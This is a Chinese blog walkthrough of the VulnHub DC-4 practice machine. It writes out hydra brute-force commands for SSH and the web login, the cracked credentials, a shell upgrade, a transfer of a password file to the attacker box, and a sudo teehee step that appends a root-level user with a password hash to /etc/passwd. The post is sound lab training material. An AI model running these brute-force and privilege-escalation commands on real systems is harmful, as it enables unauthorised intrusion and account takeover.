vulnhub-dc-4

最新推荐文章于 2024-08-24 08:42:08 发布
最新推荐文章于 2024-08-24 08:42:08 发布
阅读量181 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/106735113
版权

vulnhub-dc-4

vulnhub第五个靶机

靶机地址: https://www.vulnhub.com/entry/dc-4,313/.

知识点

nmap

用nmap查询局域网内存活的主机,发现靶机ip

nmap -T4 192.168.40.0/24

在这里插入图片描述

用nmap进行更详细的探测,发现开着的端口和服务

端口服务
22ssh
80http
nmap -T4 -sV -A -p- 192.168.40.134

在这里插入图片描述
端口:22——>爆破——>失败

hydra -l root -P rockyou.txt 192.168.40.134 ssh -t 4

在这里插入图片描述

hydra

端口:80——>web漏洞——>成功

访问主页发现是一个登录框,对后台进行扫描,没发现可利用的信息,只能对其进行爆破。
在这里插入图片描述

使用hydra对其登录页面进行爆破,爆破出帐号密码
admin:happy

hydra -l admin -P rockyou.txt 192.168.40.134 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"

在这里插入图片描述
登录到后台发现有一个可以之执行命令的页面
在这里插入图片描述

可以对其抓包反弹shell,拿shell(一句话木马和bash貌似被过滤了,所以利用nc)

在这里插入图片描述

python -c "import pty;pty.spawn('/bin/bash')"  #打开一个标准shell
cat /etc/passwd

发现有三个用户,分别是:charles、jim、sam
在这里插入图片描述
经过一番好找,最后在home/jim/backups目录下找到一个密码字典

在这里插入图片描述
在靶机上开启临时http服务,在kali上下载该密码文件

python -m SimpleHTTPServer
wget http://192.168.40.134:8000/old-passwords.bak

在这里插入图片描述在这里插入图片描述

用hydra对jim用户进行爆破

hydra -l jim -P old-passwords.bak 192.168.40.134 ssh -t 20

帐号密码:jimi:jibril04
在这里插入图片描述

teehee的sudo提权

在jim目录下发现一封邮件
在这里插入图片描述
在/var/mail下查看邮件,发现charles的密码
在这里插入图片描述
登录之后,发现charles可以无密码以root身份执行teehee命令,该命令可以追加数据

在这里插入图片描述
那我们可以添加一个权限为0的用户到/etc/passwd文件中去,拿到最后的falg

echo 'hfn:$1$xyz$X11iz6ox24iPDed6detyU.:0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub - DC-1
qq_46081990的博客
03-14 389
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub--DC5
weixin_55129870的博客
05-19 325
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2400
Vulnhub-DC-4靶机实战
Vulnhub-DC-4
KAKA的博客
07-04 292
扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路) 登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2539
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulnhub-DC4
weixin_55129870的博客
05-16 126
kaliip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC4ip: 192.168.44.144 端口扫描 nmap -A -p1-65535 -T4 192.168.44.144 开放80、22端口,对应http,ssh服务 访问http服务 指纹识别 whatweb http://192.168.44.144 得知,web服务器为nginx 1.15.10 爆破吧,猜测用户名为admin,使用kali的/.
vulnhub--DC2
weixin_55129870的博客
05-12 1292
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
Vulnhub-DC-1
KAKA的博客
06-04 904
配置信息: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 (VirtualBox) IP:192.168.67.200 攻机:Kali (Local) IP:192.168.67.109 目标:获取5个flag 开始游戏: 扫描整个网段获取目标IP地址: nmap -sn 192.168.67.0/24 获取目标IP地址:192.168.67.200 扫描目标信息: nmap-A -p-1...
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2943
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
结合量子技术解决数据传输安全
编程之道在明明德在亲民在止于至善
08-22 1222
结合量子技术解决数据传输安全
第2章-05-接口API与安全签名算法
最新发布
黑夜开发者的博客
08-24 168
API(Application Programming Interface,应用程序编程接口)接口是一种定义了软件应用程序之间通信方式的协议或规范。它允许不同的软件应用程序之间进行数据交换和功能调用,而无需了解对方内部的具体实现细节。简而言之,API接口是软件之间的桥梁,使得不同的系统或服务能够相互连接和交互。
msxml*.dll 错误 ‘80072f7d‘ 安全频道支持出错 解决方案
编程路
08-22 402
msxml6.dll错误 '80072f7d'安全频道支持出错,用 SSLTools.exe 修复的方法无效!x更换了所有版本的 ("Msxml2.ServerXMLHTTP.6.0") '("WinHttp.WinHttpRequest.5.1") 都是报这个错误,而用老的 '("Microsoft.XMLHTTP") 则卡顿更严重直接没有返回任何错误信息。
独立ip为何高级又安全
Together_GPT的博客
08-22 329
独立IP,也称为静态IP,是指由网络服务商直接分配给用户的一个独立的IP地址,该IP地址不会因用户关机、重启或断开网络而发生改变。1. 防止IP被封锁:在使用共享IP时,如果其中一个用户因违反规定或被举报而被封锁IP,其他用户也可能会受到影响。3. 隐藏真实IP地址:使用独立IP可以更好地保护用户的隐私和安全,因为用户可以通过代理服务器或VPN等手段使用独立IP进行上网,隐藏自己的真实IP地址,防止被黑客攻击或被追踪。搜索引擎会认为拥有独立IP的网站更可靠,更容易被收录和排名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值